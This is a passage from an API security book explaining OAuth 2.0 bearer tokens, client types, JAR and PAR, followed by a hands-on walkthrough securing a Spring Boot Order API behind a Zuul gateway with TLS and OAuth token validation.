Based on the token_ type, the authorization server can add additional attributes/parameters to the response. OAuth 2.0 has two main token profiles: OAuth 2.0 Bearer Token Profile and OAuth 2.0 MAC Token Profile. The most popular OAuth token profile is Bearer; almost all OAuth 2.0 deployments today are based on the OAuth 2.0 Bearer Token Profile. The next section talks about the Bearer Token Profile in detail, and Appendix G discusses the MAC Token Profile. OAuth 2.0 Bearer Token Profile The OAuth 2.0 Bearer Token Profile was influenced by OAuth WRAP, which only supported bearer tokens. As its name implies, anyone who bears the token can use it—don’t lose it! Bearer tokens must always be used over Transport Layer Security (TLS) to avoid losing them in transit. Once the bearer access token is obtained from the authorization server, the client can use it in three ways to talk to the resource server. These three ways are defined in the RFC 6750. The most popular way is to include the access token in the HTTP Authorization header: Note an Oauth 2.0 bearer token can be a reference token or self-contained token. a reference token is an arbitrary string. an attacker can carry out a brute- force attack to guess the token. the authorization server must pick the right length and use other possible measures to prevent brute forcing. a self-contained access token is a JsOn Web token (JWt), which we discuss in Chapter 7. When the resource server gets an access token, which is a reference token, then to validate the token, it has to talk to the authorization server (or the token issuer). When the access token is a JWt, the resource server can validate the token by itself, by verifying the signature of the JWt. Chapter 4 Oauth 2.0 Fundamentals 95 GET /resource HTTP/1.1 Host: rs.example.com Authorization: Bearer JGjhgyuyibGGjgjkjdlsjkjdsd The access token can also be included as a query parameter. This approach is mostly used by the client applications developed in JavaScript: GET /resource?access_token=JGjhgyuyibGGjgjkjdlsjkjdsd Host: rs.example.com Note When the value of the Oauth access token is sent as a query parameter, the name of the parameter must be access_token. Both Facebook and Google use the correct parameter name, but linkedIn uses oauth2_access_token and salesforce uses oauth_token. It’s also possible to send the access token as a form-encoded body parameter. An authorization server supporting the Bearer Token Profile should be able to handle any of these patterns: POST /resource HTTP/1.1 Host: server.example.com Content-Type: application/x-www-form-urlencoded access_token=JGjhgyuyibGGjgjkjdlsjkjdsd Note the value of the Oauth bearer token is only meaningful to the authorization server. the client application should not try to interpret what it says. to make the processing logic efficient, the authorization server may include some meaningful but nonconfidential data in the access token. For example, if the authorization server supports multiple domains with multitenancy, it may include the tenant domain in the access token and then base64-encode (see appendix e) it or simply use a JsOn Web token (JWt). Chapter 4 Oauth 2.0 Fundamentals 96 OAuth 2.0 Client Types OAuth 2.0 identifies two types of clients: confidential clients and public clients. Confidential clients are capable of protecting their own credentials (the client key and the client secret), whereas public clients can’t. 
The OAuth 2.0 specification is built around three types of client profiles: web applications, user agent–based applications, and native applications. Web applications are considered to be confidential clients, running on a web server: end users or resource owners access such applications via a web browser. User agent–based applications are considered to be public clients: they download the code from a web server and run it on the user agent, such as JavaScript running in the browser. These clients are incapable of protecting their credentials—the end user can see anything in the JavaScript. Native applications are also considered as public clients: these clients are under the control of the end user, and any confidential data stored in those applications can be extracted out. Android and iOS native applications are a couple of examples. Note all four grant types defined in the Oauth 2.0 core specification require the client to preregister with the authorization server, and in return it gets a client identifier. under the implicit grant type, the client doesn’t get a client secret. at the same time, even under other grant types, it’s an option whether to use the client secret or not. Table 4-2 lists the key differences between OAuth 1.0 and OAuth 2.0 Bearer Token Profile. Table 4-2. OAuth 1.0 vs. OAuth 2.0 OAuth 1.0 OAuth 2.0 Bearer Token Profile an access delegation protocol an authorization framework for access delegation signature based: hmaC-sha256/rsa- sha256 nonsignature-based, Bearer token profile less extensibility highly extensible via grant types and token types less developer-friendly tls required only during the initial handshake secret key never passed on the wire more developer-friendly Bearer token profile mandates using tls during the entire flow secret key goes on the wire (Bearer token profile) Chapter 4 Oauth 2.0 Fundamentals 97 Note Oauth 2.0 introduces a clear separation between the client, the resource owner, the authorization server, and the resource server. But the core Oauth 2.0 specification doesn’t talk about how the resource server validates an access token. most Oauth implementations started doing this by talking to a proprietary apI exposed by the authorization server. the Oauth 2.0 token Introspection profile standardized this to some extent, and in Chapter 9, we talk more about it. JWT Secured Authorization Request (JAR) In an OAuth 2.0 request to the authorize endpoint of the authorization server, all the request parameters flow via the browser as query parameters. The following is an example of an OAuth 2.0 authorization code grant request: https://authz.example.com/oauth2/authorize? response_type=token& client_id=0rhQErXIX49svVYoXJGt0DWBuFca& redirect_uri=https%3A%2F%2Fmycallback There are a couple of issues with this approach. Since these parameters flow via the browser, the end user or anyone on the browser can change the input parameters that could result in some unexpected outcomes at the authorization server. At the same time, since the request is not integrity protected, the authorization server has no means to validate who initiated the request. With JSON Web Token (JWT) secured authorization requests, we can overcome these two issues. If you are new to JWT, please check Chapters 7 and 8. JSON Web Token (JWT) defines a container to transport data between interested parties in a cryptographically safe manner. 
The JSON Web Signature (JWS) specification developed under the IETF JOSE working group, represents a message or a payload, which is digitally signed or MACed (when a hashing algorithm is used with HMAC), while the JSON Web Encryption (JWE) specification standardizes a way to represent an encrypted payload. One of the draft proposals1 to the IETF OAuth working group suggests to introduce the ability to send request parameters in a JWT, which allows the request to be signed 1 The OAuth 2.0 Authorization Framework: JWT Secured Authorization Request (JAR). Chapter 4 Oauth 2.0 Fundamentals 98 with JWS and encrypted with JWE so that the integrity, source authentication, and confidentiality properties of the authorization request are preserved. At the time of writing, this proposal is in its very early stage—and if you are familiar with Security Assertion Markup Language (SAML) Single Sign-On, this is quite analogous to the signed authentication requests in SAML. The following shows the decoded payload of a sample authorization request, which ideally goes within a JWT: { "iss": "s6BhdRkqt3", "aud": "https://server.example.com", "response_type": "code id_token", "client_id": "s6BhdRkqt3", "redirect_uri": "https://client.example.org/cb", "scope": "openid", "state": "af0ifjsldkj", "nonce": "n-0S6_WzA2Mj", "max_age": 86400 } Once the client application constructs the JWT (a JWS or a JWE—please see Chapters 7 and 8 for the details), it can send the authorization request to the OAuth authorization server in two ways. One way is called passing by value, and the other is passing by reference. The following shows an example of passing by value, where the client application sends the JWT in a query parameter called request. The [jwt_assertion] in the following request represents either the actual JWS or JWE. https://server.example.com/authorize?request=[jwt_assertion] The draft proposal for JWT authorization request introduces the pass by reference method to overcome some of the limitations in the pass by value method, as listed here: • Many mobile phones in the market as of this writing still do not accept large payloads. The payload restriction is typically either 512 or 1024 ASCII characters. • The maximum URL length supported by older versions of the Internet Explorer is 2083 ASCII characters. Chapter 4 Oauth 2.0 Fundamentals 99 • On a slow connection such as a 2G mobile connection, a large URL would cause a slow response. Therefore the use of such is not advisable from the user experience point of view. The following shows an example of pass by reference, where the client application sends a link in the request, which can be used by the authorization server to fetch the JWT. This is a typical OAuth 2.0 authorization code request, along with the new request_ uri query parameter. The value of the request_uri parameter carries a link pointing to the corresponding JWS or JWE. https://server.example.com/authorize? response_type=code& client_id=s6BhdRkqt3& request_uri=https://tfp.example.org/request.jwt/Schjwew& state=af0ifjsldkj Pushed Authorization Requests (PAR) This is another draft proposal being discussed under the IETF OAuth working group at the moment, which complements the JWT Secured Authorization Request (JAR) approach we discussed in the previous section. One issue with JAR is each client has to expose an endpoint directly to the authorization server. This is the endpoint that hosts the corresponding JWT, which is used by the authorization server. 
With the Pushed Authorization Requests (PAR) draft proposal, this requirement goes away. PAR defines an endpoint at the authorization server end, where each client can directly push (without going through the browser) all the parameters in a typical OAuth 2.0 authorization request and then use the normal authorization flow via the browser to pass a reference to the pushed request. The following is an example, where the client application pushes the authorization request parameters to an endpoint hosted at the authorization server. This push endpoint on the authorization server can be secured either with mutual Transport Layer Security (TLS) or with OAuth 2.0 itself (client credentials) or with any other means as agreed between the client application and the authorization server.

POST /as/par HTTP/1.1
Host: server.example.com
Content-Type: application/x-www-form-urlencoded
Authorization: Basic czZCaGRSa3F0Mzo3RmpmcDBaQnIxS3REUmJuZlZkbUl3

response_type=code&
state=af0ifjsldkj&
client_id=s6BhdRkqt3&
redirect_uri=https%3A%2F%2Fclient.example.org%2Fcb&
scope=ais

If the client follows the JAR specification, which we discussed in the previous section, it can also send a JWS or a JWE to the push endpoint in the following way.

POST /as/par HTTP/1.1
Host: server.example.com
Content-Type: application/x-www-form-urlencoded
Authorization: Basic czZCaGRSa3F0Mzo3RmpmcDBaQnIxS3REUmJuZlZkbUl3

request=[jwt_assertion]

Once the push endpoint at the authorization server receives the preceding request, it has to carry out all the validation checks against the request that it usually performs against a typical authorization request. If everything looks good, the authorization server responds with the following. The value of the request_uri parameter in the response is bound to the client_id in the request and acts as a reference to the authorization request.

HTTP/1.1 201 Created
Date: Tue, 2 Oct 2019 15:22:31 GMT
Content-Type: application/json

{
  "request_uri": "urn:example:bwc4JK-ESC0w8acc191e-Y1LTC2",
  "expires_in": 3600
}

Upon receiving the push response from the authorization server, the client application can construct the following request with the request_uri parameter from the response to redirect the user to the authorization server.

https://server.example.com/authorize?
request_uri=urn:example:bwc4JK-ESC0w8acc191e-Y1LTC2

Summary

• OAuth 2.0 is the de facto standard for securing APIs, and it primarily solves the access delegation problem.
• A grant type in OAuth 2.0 defines how a client can obtain an authorization grant from a resource owner to access a resource on his/her behalf.
• The OAuth 2.0 core specification defines five grant types: authorization code, implicit, password, client credentials, and refresh.
• The refresh grant type is a special grant type, used by an OAuth 2.0 client application to renew an expired or close-to-expiry access token.
• The implicit and client credentials grant types do not return a refresh token.
• The implicit grant type is obsolete and is not recommended due to its inherent security issues.
• OAuth 2.0 supports two types of client applications: public clients and confidential clients. Single-page applications and native mobile applications fall under public clients, while web applications fall under confidential clients.
• The OAuth 2.0 Authorization Framework: JWT Secured Authorization Request (JAR) draft proposal suggests introducing the ability to send request parameters in a JWT.
• The Pushed Authorization Requests (PAR) draft proposal suggests introducing a push endpoint at the authorization server end, so that client applications can securely push all the authorization request parameters and then initiate the browser-based login flow.

CHAPTER 5

Edge Security with an API Gateway

The API gateway is the most common pattern in securing APIs in a production deployment. In other words, it's the entry point to your API deployment. There are many open source and proprietary products out there, which implement the API gateway pattern, and which we commonly identify as API gateways. An API gateway is a policy enforcement point (PEP), which centrally enforces authentication, authorization, and throttling policies. Further, we can use an API gateway to centrally gather all the analytics related to APIs and publish those to an analytics product for further analysis and presentation.

Setting Up Zuul API Gateway

Zuul (https://github.com/Netflix/zuul) is an API gateway (see Figure 5-1) that provides dynamic routing, monitoring, resiliency, security, and more. It acts as the front door to Netflix's server infrastructure, handling traffic from all Netflix users around the world. It also routes requests, supports developers' testing and debugging, provides deep insight into Netflix's overall service health, protects the Netflix deployment from attacks, and channels traffic to other cloud regions when an Amazon Web Services (AWS) region is in trouble. In this section, we are going to set up Zuul as an API gateway to front the Order API, which we developed in Chapter 3.

Figure 5-1. A typical Zuul API gateway deployment at Netflix. All the Netflix microservices are fronted by an API gateway

All the samples used in this book are available in the https://github.com/apisecurity/samples.git git repository. Use the following git command to clone it. All the samples related to this chapter are inside the directory ch05. To run the samples in the book, we assume you have installed Java (JDK 1.8+) and Apache Maven 3.2.0+.

\> git clone https://github.com/apisecurity/samples.git
\> cd samples/ch05

Running the Order API

This is the simplest API implementation ever, which is developed with Java Spring Boot. In fact, one could call it a microservice as well. You can find the code inside the directory ch05/sample01. To build the project with Maven, use the following command from the sample01 directory:

\> cd sample01
\> mvn clean install
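If you want a feel for what sits inside sample01 before running it, the following is a simplified sketch of a Spring Boot resource along the same lines. The class name and the hard-coded JSON it returns are illustrative only; the actual sample in the git repository is more complete.

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RestController;

@SpringBootApplication
@RestController
public class OrderApplication {

    public static void main(String[] args) {
        SpringApplication.run(OrderApplication.class, args);
    }

    // Returns a canned order as JSON. A real implementation would look the
    // order up in a data store and return a typed object instead of a string.
    @GetMapping("/order/{id}")
    public String getOrder(@PathVariable("id") String orderId) {
        return "{\"customer_id\":\"101021\",\"order_id\":\"" + orderId + "\","
                + "\"shipping_address\":\"201, 1st Street, San Jose, CA\"}";
    }
}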
Or in other words, the Zuul gateway will proxy all the requests to the Order service. You can find the code inside ch05/sample02 directory. To build the project with Maven, use the following commands: \> cd sample02 \> mvn clean install Before we delve deep into the code, let’s have a look at some of the notable Maven dependencies and plugins added into ch05/sample02/pom.xml. Spring Boot comes with different starter dependencies to integrate with different Spring modules. The spring- cloud-starter-zuul dependency (as shown in the following) brings in Zuul API gateway dependencies and does all the wiring between the components, making the developer’s work to a minimum. <dependency> <groupId>org.springframework.cloud</groupId> <artifactId>spring-cloud-starter-zuul</artifactId> </dependency> Chapter 5 edge SeCurity with an api gateway 106 It is important to have a look at the class file src/main/java/com/apress/ch05/ sample02/GatewayApplication.java. This is the class which spins up the Zuul API gateway. By default it starts on port 8080, and you can change the port by adding, say, for example, server.port=9000 to the src/main/resources/application.properties file. This will set the API gateway port to 9000. The following shows the code snippet from GatewayApplication class, which spins up the API gateway. The @EnableZuulProxy annotation instructs the Spring framework to start the Spring application as a Zuul proxy. @EnableZuulProxy @SpringBootApplication public class GatewayApplication { public static void main(String[] args) { SpringApplication.run(GatewayApplication.class, args); } } Now, let’s see how to start the API gateway and talk to it with a cURL client. The following command executed from ch05/sample02 directory shows how to start the API gateway with Maven. Since the Zuul API gateway is also another Spring Boot application, the way you start it is the same as how we did before with the Order service. \> mvn spring-boot:run To test the Order API, which is now proxied through the Zuul API gateway, let’s use the following cURL. It will print the output as shown in the following. Also make sure that the Order service is still up and running on port 8080. Here we add a new context called retail (which we didn’t see in the direct API call) and talk to the port 9090, where the API gateway is running. \> curl http://localhost:9090/retail/order/11 {"customer_id":"101021","order_id":"11","payment_method":{"card_type": "VISA","expiration":"01/22","name":"John Doe","billing_address":"201, 1st Street, San Jose, CA"},"items": [{"code":"101","qty":1},{"code":"103","qty" :5}],"shipping_address":"201, 1st Street, San Jose, CA"} Chapter 5 edge SeCurity with an api gateway 107 What Happens Underneath? When the API gateway receives a request to the retail context, it routes the request to the back-end API. These routing instructions are set in the src/main/resources/ application.properties file, as shown in the following. If you want to use some other context, instead of retail, then you need to change the property key appropriately. zuul.routes.retail.url=http://localhost:8080 Enabling TLS for the Zuul API Gateway In the previous section, the communication between the cURL client and the Zuul API gateway happened over HTTP, which is not secure. In this section, let’s see how to enable Transport Layer Security (TLS) at the Zuul API gateway. In Chapter 3, we discussed how to secure the Order service with TLS. 
There the Order service is a Java Spring Boot application, and we follow the same process here to secure the Zuul API gateway with TLS, as Zuul is also another Java Spring Boot application. To enable TLS, first we need to create a public/private key pair. The following command uses keytool that comes with the default Java distribution to generate a key pair and stores it in keystore.jks file. If you are to use the keystore.jks file as it is, which is inside sample02 directory, you can possibly skip this step. Chapter 3 explains in detail what each parameter in the following command means. \> keytool -genkey -alias spring -keyalg RSA -keysize 4096 -validity 3650 -dname "CN=zool,OU=bar,O=zee,L=sjc,S=ca,C=us" -keypass springboot -keystore keystore.jks -storeType jks -storepass springboot To enable TLS for the Zuul API gateway, copy the keystore file (keystore.jks), which we created earlier, to the home directory of the gateway (e.g., ch05/sample02/) and add the following to the [SAMPLE_HOME]/src/main/resources/application. properties file. The samples that you download from the samples git repository already have these values (and you only need to uncomment them), and we are using springboot as the password for both the keystore and the private key. server.ssl.key-store: keystore.jks server.ssl.key-store-password: springboot server.ssl.keyAlias: spring Chapter 5 edge SeCurity with an api gateway 108 To validate that everything works fine, use the following command from ch05/sample02/ directory to spin up the Zuul API gateway and notice the line, which prints the HTTPS port. If you already have the Zuul gateway running from the previous exercise, please shut it down first. \> mvn spring-boot:run Tomcat started on port(s): 9090 (https) with context path " Assuming you already have the Order service still running from the previous section, run the following cURL command to access the Order service via the Zuul gateway, over HTTPS. \> curl –k https://localhost:9090/retail/order/11 {"customer_id":"101021","order_id":"11","payment_method":{"card_type":"V ISA","expiration":"01/22","name":"John Doe","billing_address":"201, 1st Street, San Jose, CA"},"items": [{"code":"101","qty":1},{"code":"103","qty" :5}],"shipping_address":"201, 1st Street, San Jose, CA"} We used the -k option in the preceding cURL command. Since we have self-signed (untrusted) certificates to secure our HTTPS endpoint, we need to pass the –k parameter to advise cURL to ignore the trust validation. In a production deployment with proper certificate authority–signed certificates, you do not need to do that. Also, if you have self- signed certificates, you can still avoid using –k, by pointing cURL to the corresponding public certificate. \> curl --cacert ca.crt https://localhost:9090/retail/order/11 You can use the following keytool command from ch05/sample02/ to export the public certificate of the Zuul gateway to ca.crt file in PEM (with the -rfc argument) format. \> keytool -export -file ca.crt -alias spring –rfc -keystore keystore.jks -storePass springboot The preceding command will result in the following error. This complains that the common name in certificate, which is zool, does not match with the hostname (localhost) in the cURL command. curl: (51) SSL: certificate subject name 'zool' does not match target host name 'localhost' Chapter 5 edge SeCurity with an api gateway 109 Ideally, in a production deployment when you create a certificate, its common name should match the hostname. 
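If you control the keystore, another option for local testing is simply to regenerate the gateway's key pair with a common name that matches the host you plan to call. The following is an illustrative variant of the earlier keytool command (not part of the book's samples), using localhost as the common name:

\> keytool -genkey -alias spring -keyalg RSA -keysize 4096 -validity 3650 -dname "CN=localhost,OU=bar,O=zee,L=sjc,S=ca,C=us" -keypass springboot -keystore keystore.jks -storeType jks -storepass springboot

With a certificate issued to CN=localhost, the subject name matches the hostname in the cURL command, and no hostname workaround is needed.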
In this case, since we do not have Domain Name Service (DNS) entry for the zool hostname, you can use the following workaround, with cURL. \> curl --cacert ca.crt https://zool:9090/retail/order/11 --resolve zool:9090:127.0.0.1 Enforcing OAuth 2.0 Token Validation at the Zuul API Gateway In the previous section, we explained how to proxy requests to an API, via the Zuul API gateway. There we didn’t worry about enforcing security. In this section, we will discuss how to enforce OAuth 2.0 token validation at the Zuul API gateway. There are two parts in doing that. First we need to have an OAuth 2.0 authorization server (also we can call it a security token service) to issue tokens, and then we need to enforce OAuth token validation at the Zuul API gateway (see Figure 5-2). Figure 5-2. The Zuul API gateway intercepts all the requests going to the Order API and validates OAuth 2.0 access tokens against the authorization server (STS) Chapter 5 edge SeCurity with an api gateway 110 Setting Up an OAuth 2.0 Security Token Service (STS) The responsibility of the security token service (STS) is to issue tokens to its clients and respond to the validation requests from the API gateway. There are many open source OAuth 2.0 authorization servers out there: WSO2 Identity Server, Keycloak, Gluu, and many more. In a production deployment, you may use one of them, but for this example, we are setting up a simple OAuth 2.0 authorization server with Spring Boot. It is another microservice and quite useful in developer testing. The code corresponding to the authorization server is under ch05/sample03 directory. Let’s have a look at ch05/sample03/pom.xml for notable Maven dependencies. These dependencies introduce a new set of annotations (@EnableAuthorizationServer annotation and @EnableResourceServer annotation), to turn a Spring Boot application to an OAuth 2.0 authorization server. <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-security</artifactId> </dependency> <dependency> <groupId>org.springframework.security.oauth</groupId> <artifactId>spring-security-oauth2</artifactId> </dependency> The class sample03/src/main/java/com/apress/ch05/sample03/TokenServiceApp. java carries the @EnableAuthorizationServer annotation, which turns the project into an OAuth 2.0 authorization server. We’ve added @EnableResourceServer annotation to the same class, as it also has to act as a resource server, to validate access tokens and return back the user information. It’s understandable that the terminology here is a little confusing, but that’s the easiest way to implement the token validation endpoint (in fact the user info endpoint, which also indirectly does the token validation) in Spring Boot. When you use self-contained access tokens (JWTs), this token validation endpoint is not required. If you are new to JWT, please check Chapter 7 for details. The registration of clients with the Spring Boot authorization server can be done in multiple ways. This example registers clients in the code itself, in sample03/src/ main/java/com/apress/ch05/sample03/config/AuthorizationServerConfig. java file. The AuthorizationServerConfig class extends the AuthorizationServerConfigurerAdapter class to override its default behavior. 
Here Chapter 5 edge SeCurity with an api gateway 111 we set the value of client id to 10101010, client secret to 11110000, available scope values to foo and/or bar, authorized grant types to client_credentials, password, and refresh_token, and the validity period of an access token to 6000 seconds. Most of the terms we use here are from OAuth 2.0 and explained in Chapter 4. @Override public void configure(ClientDetailsServiceConfigurer clients) throws Exception { clients.inMemory().withClient("10101010") .secret("11110000").scopes("foo", "bar") .authorizedGrantTypes("client_credentials", "password", "refresh_token") .accessTokenValiditySeconds(6000); } To support password grant type, the authorization server has to connect to a user store. A user store can be a database or an LDAP server, which stores user credentials and attributes. Spring Boot supports integration with multiple user stores, but once again, the most convenient one, which is just good enough for this example, is an in- memory user store. The following code from sample03/src/main/java/com/apress/ ch05/sample03/config/WebSecurityConfiguration.java file adds a user to the system, with the role USER. @Override public void configure(AuthenticationManagerBuilder auth) throws Exception { auth.inMemoryAuthentication() .withUser("peter").password("peter123").roles("USER"); } Once we define the in-memory user store in Spring Boot, we also need to engage that with the OAuth 2.0 authorization flow, as shown in the following, in the code sample03/ src/main/java/com/apress/ch05/sample03/config/AuthorizationServerConfig. java. @Autowired private AuthenticationManager authenticationManager; @Override Chapter 5 edge SeCurity with an api gateway 112 public void configure(AuthorizationServerEndpointsConfigurer endpoints) throws Exception { endpoints.authenticationManager(authenticationManager); } To start the authorization server, use the following command from ch05/sample03/ directory to spin up the TokenService microservice, and it starts running on HTTPS port 8443. \> mvn spring-boot:run Testing OAuth 2.0 Security Token Service (STS) To get an access token using the OAuth 2.0 client credentials grant type, use the following command. Make sure to replace the values of $CLIENTID and $CLIENTSECRET appropriately. The hard-coded values for client id and client secret used in our example are 10101010 and 11110000, respectively. Also you might have noticed already, the STS endpoint is protected with Transport Layer Security (TLS). To protect STS with TLS, we followed the same process we did before while protecting the Zuul API gateway with TLS. \> curl -v -X POST --basic -u $CLIENTID:$CLIENTSECRET -H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" -k -d "grant_type=client_ credentials&scope=foo" https://localhost:8443/oauth/token {"access_token":"81aad8c4-b021-4742-93a9-e25920587c94","token_ type":"bearer","expires_in":43199,"scope":"foo"} Note we use the –k option in the preceding curL command. Since we have self-signed (untrusted) certificates to secure our httpS endpoint, we need to pass the –k parameter to advise curL to ignore the trust validation. you can find more details regarding the parameters used here from the Oauth 2.0 6749 rFC: https://tools.ietf.org/html/rfc6749 and also explained in Chapter 4. To get an access token using the password OAuth 2.0 grant type, use the following command. Make sure to replace the values of $CLIENTID, $CLIENTSECRET, $USERNAME, and $PASSWORD appropriately. 
The hard-coded values for client id and client secret Chapter 5 edge SeCurity with an api gateway 113 used in our example are 10101010 and 11110000, respectively; and for username and password, we use peter and peter123, respectively. \> curl -v -X POST --basic -u $CLIENTID:$CLIENTSECRET -H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" -k -d "grant_type=passwor d&username=$USERNAME&password=$PASSWORD&scope=foo" https://localhost:8443/ oauth/token {"access_token":"69ff86a8-eaa2-4490-adda-6ce0f10b9f8b","token_ type":"bearer","refresh_token":"ab3c797b-72e2-4a9a-a1c5- c550b2775f93","expires_in":43199,"scope":"foo"} Note if you carefully observe the two responses we got for the Oauth 2.0 client credentials grant type and the password grant type, you might have noticed that there is no refresh token in the client credentials grant type flow. in Oauth 2.0, the refresh token is used to obtain a new access token, when the access token has expired or is closer to expire. this is quite useful, when the user is offline and the client application has no access to his/her credentials to get a new access token and the only way is to use a refresh token. For the client credentials grant type, there is no user involved, and it always has access to its own credentials, so can be used any time it wants to get a new access token. hence, a refresh token is not required. Now let’s see how to validate an access token, by talking to the authorization server. The resource server usually does this. An interceptor running on the resource server intercepts the request, extracts out the access token, and then talks to the authorization server. In a typical API deployment, this validation happens over a standard endpoint exposed by the OAuth authorization server. This is called the introspection endpoint, and in Chapter 9, we discuss OAuth token introspection in detail. However, in this example, we have not implemented the standard introspection endpoint at the authorization server (or the STS), but rather use a custom endpoint for token validation. The following command shows how to directly talk to the authorization server to validate the access token obtained in the previous command. Make sure to replace the value of $TOKEN with the corresponding access token appropriately. Chapter 5 edge SeCurity with an api gateway 114 \> curl -k -X POST -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://localhost:8443/user {"details":{"remoteAddress":"0:0:0:0:0:0:0:1","sessionId":null,"tokenValue": "9f3319a1-c6c4-4487-ac3b-51e9e479b4ff","tokenType":"Bearer","decodedDetails": null},"authorities":[],"authenticated":true,"userAuthentication":null, "credentials":"","oauth2Request":{"clientId":"10101010","scope":["bar"], "requestParameters":{"grant_type":"client_credentials","scope":"bar"}, "resourceIds":[],"authorities":[],"approved":true,"refresh":false,"redirect Uri":null,"responseTypes":[],"extensions":{},"grantType":"client_credentials", "refreshTokenRequest":null},"clientOnly":true,"principal":"10101010", "name":"10101010"} The preceding command returns back the metadata associated with the access token, if the token is valid. The response is built inside the user() method of sample03/ src/main/java/com/apress/ch05/sample03/TokenServiceApp.java class, as shown in the following code snippet. With the @RequestMapping annotation, we map the /user context (from the request) to the user() method. 
@RequestMapping("/user") public Principal user(Principal user) { return user; } Note By default, with no extensions, Spring Boot stores issued tokens in memory. if you restart the server after issuing a token, and then validate it, it will result in an error response. Setting Up Zuul API Gateway for OAuth 2.0 Token Validation To enforce token validation at the API gateway, we need to uncomment the following property in sample02/src/main/resources/application.properties file, as shown in the following. The value of the security.oauth2.resource.user-info-uri property carries the endpoint of the OAuth 2.0 security token service, which is used to validate tokens. security.oauth2.resource.user-info-uri=https://localhost:8443/user Chapter 5 edge SeCurity with an api gateway 115 The preceding property points to an HTTPs endpoint on the authorization server. To support the HTTPS connection between the Zuul gateway and the authorization server, there is one more change we need to do at the Zuul gateway end. When we have a TLS connection between the Zuul gateway and the authorization server, the Zuul gateway has to trust the certificate authority associated with the public certificate of the authorization server. Since we are using self-signed certificate, we need to export authorization server’s public certificate and import it to Zuul gateway’s keystore. Let’s use the following keytool command from ch05/sample03 directory to export authorization server’s public certificate and copy it to ch05/sample02 directory. If you are using keystores from the samples git repo, then you may skip the following two keytool commands. \> keytool -export -alias spring -keystore keystore.jks -storePass springboot -file sts.crt Certificate stored in file <sts.crt> \> cp sts.crt ../sample02 Let’s use the following keytool command from ch05/sample02 directory to import security token service’s public certificate to Zuul gateway’s keystore. \> keytool -import -alias sts -keystore keystore.jks -storePass springboot -file sts.crt Trust this certificate? [no]:yes Certificate was added to keystore We also need to uncomment the following two dependencies in the sample02/pom. xml file. These dependencies do the autowiring between Spring Boot components to enforce OAuth 2.0 token validation at the Zuul gateway. <dependency> <groupId>org.springframework.security</groupId> <artifactId>spring-security-jwt</artifactId> </dependency> <dependency> <groupId>org.springframework.security.oauth</groupId> <artifactId>spring-security-oauth2</artifactId> </dependency> Chapter 5 edge SeCurity with an api gateway 116 Finally, we need to uncomment the @EnableResourceServer annotation and the corresponding package import on the GatewayApplication (ch05/sample02/ GatewayApplication.java) class. Let’s run the following command from the ch05/sample02 directory to start the Zuul API gateway. In case it is running already, you need to stop it first. Also, please make sure sample01 (Order service) and sample03 (STS) are still up and running. \> mvn spring-boot:run To test the API, which is now proxied through the Zuul API gateway and secured with OAuth 2.0, let’s use the following cURL. It should fail, because we do not pass an OAuth 2.0 token. \> curl –k https://localhost:9090/retail/order/11 Now let’s see how to invoke the API properly with a valid access token. First we need to talk to the security token service and get an access token. 
Make sure to replace the values of $CLIENTID, $CLIENTSECRET, $USERNAME, and $PASSWORD appropriately in the following command. The hard-coded values for client id and client secret used in our example are 10101010 and 11110000, respectively; and for username and password, we used peter and peter123, respectively. \> curl -v -X POST --basic -u $CLIENTID:$CLIENTSECRET -H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" -k -d "grant_type=passwor d&username=$USERNAME&password=$PASSWORD&scope=foo" https://localhost:8443/ oauth/token {"access_token":"69ff86a8-eaa2-4490-adda-6ce0f10b9f8b","token_ type":"bearer","refresh_token":"ab3c797b-72e2-4a9a-a1c5- c550b2775f93","expires_in":43199,"scope":"foo"} Now let’s use the access token from the preceding response to invoke the Order API. Make sure to replace the value of $TOKEN with the corresponding access token appropriately. \> curl -k -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/ json" https://localhost:9090/retail/order/11 {"customer_id":"101021","order_id":"11","payment_method":{"card_type": "VISA","expiration":"01/22","name":"John Doe","billing_address":"201, 1st Chapter 5 edge SeCurity with an api gateway 117 Street, San Jose, CA"},"items": [{"code":"101","qty":1},{"code":"103","qty" :5}],"shipping_address":"201, 1st Street, San Jose, CA"} Enabling Mutual TLS Between Zuul API Gateway and Order Service So far in this chapter, we have protected the communication between the cURL client and STS, cURL client and Zuul API gateway, and Zuul API gateway and STS over TLS. Still we have a weak link in our deployment (see Figure 5-3). The communication between the Zuul gateway and Order service is neither protected with TLS nor authentication. In other words, if someone can bypass the gateway, they can reach the Order server with no authentication. To fix this, we need to secure the communication between the gateway and the Order service over mutual TLS. Then, no other request can reach the Order service without going through the gateway. Or in other words, the Order service only accepts requests generated from the gateway. Figure 5-3. The Zuul API gateway intercepts all the requests going to the Order API and validates OAuth 2.0 access tokens against the authorization server (STS) Chapter 5 edge SeCurity with an api gateway 118 To enable mutual TLS between the gateway and the Order service, first we need to create a public/private key pair. The following command uses keytool that comes with the default Java distribution to generate a key pair and stores it in keystore.jks file. Chapter 3 explains in detail what each parameter in the following command means. If you are using keystores from the samples git repo, then you may skip the following keytool commands. \> keytool -genkey -alias spring -keyalg RSA -keysize 4096 -validity 3650 -dname "CN=order,OU=bar,O=zee,L=sjc,S=ca,C=us" -keypass springboot -keystore keystore.jks -storeType jks -storepass springboot To enable mutual TLS for the Order service, copy the keystore file (keystore. jks), which we created earlier, to the home directory of the Order service (e.g., ch05/ sample01/) and add the following to the [SAMPLE_HOME]/src/main/resources/ application.properties file. The samples that you download from the samples git repository already have these values (and you only need to uncomment them), and we are using springboot as the password for both the keystore and the private key. The server.ssl.client-auth parameter is used to enforce mutual TLS at the Order service. 
